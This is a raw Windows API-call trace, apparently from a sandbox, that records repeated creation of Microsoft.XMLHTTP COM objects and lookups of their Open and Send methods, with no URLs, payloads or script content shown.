	[0838.680] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0838.680] SysStringLen (param_1=0x0) returned 0x0
	[0838.680] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0838.680] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0838.680] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0838.680] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0838.680] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0838.681] ??2@YAPEAX_K@Z () returned 0x62f330
	[0838.681] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0838.681] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0838.681] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0838.681] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0838.681] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0838.681] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0838.681] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0838.684] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0838.684] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0838.684] SysStringLen (param_1=0x0) returned 0x0
	[0838.684] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0838.684] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0838.684] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0838.684] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0838.684] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0838.684] ??2@YAPEAX_K@Z () returned 0x62f310
	[0838.685] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0838.685] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0838.685] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0838.685] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0838.685] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0838.685] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0838.685] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0838.685] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0838.685] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0838.685] SysStringLen (param_1=0x0) returned 0x0
	[0838.685] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0838.686] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0838.686] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0838.686] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0838.686] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7548) returned 0x0
	[0838.686] ??2@YAPEAX_K@Z () returned 0x62f330
	[0838.686] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7548, pUnkSite=0x62f330) 
	[0838.686] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0838.686] XMLHTTPRequest:IUnknown:Release (This=0x49c7548) returned 0x0
	[0838.686] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0838.686] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0838.686] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0838.686] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0838.687] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0838.687] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0838.687] SysStringLen (param_1=0x0) returned 0x0
	[0838.687] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0838.687] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0838.687] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0838.687] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0838.687] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0838.687] ??2@YAPEAX_K@Z () returned 0x62f310
	[0838.687] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0838.687] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0838.687] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0838.687] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0838.688] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0838.688] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0838.688] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0838.688] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0838.688] longjmp () 
	[0838.688] longjmp () 
	[0838.688] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0838.688] SysStringLen (param_1=0x0) returned 0x0
	[0838.688] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0838.689] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0838.689] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0838.689] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0838.689] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7518) returned 0x0
	[0838.689] ??2@YAPEAX_K@Z () returned 0x62f330
	[0838.689] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7518, pUnkSite=0x62f330) 
	[0838.689] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0838.689] XMLHTTPRequest:IUnknown:Release (This=0x49c7518) returned 0x0
	[0838.689] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0838.689] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0838.689] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0838.690] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0838.690] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0838.690] longjmp () 
	[0838.690] longjmp () 
	[0838.690] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0838.690] SysStringLen (param_1=0x0) returned 0x0
	[0838.690] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0838.690] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0838.690] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7560) returned 0x0
	[0838.691] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0838.691] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0838.691] ??2@YAPEAX_K@Z () returned 0x62f310
	[0838.691] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0838.691] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0838.691] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0838.691] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7560) returned 0x0
	[0838.691] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7560) returned 0x3
	[0838.691] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0838.691] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0838.691] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0838.692] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0838.692] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0838.692] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
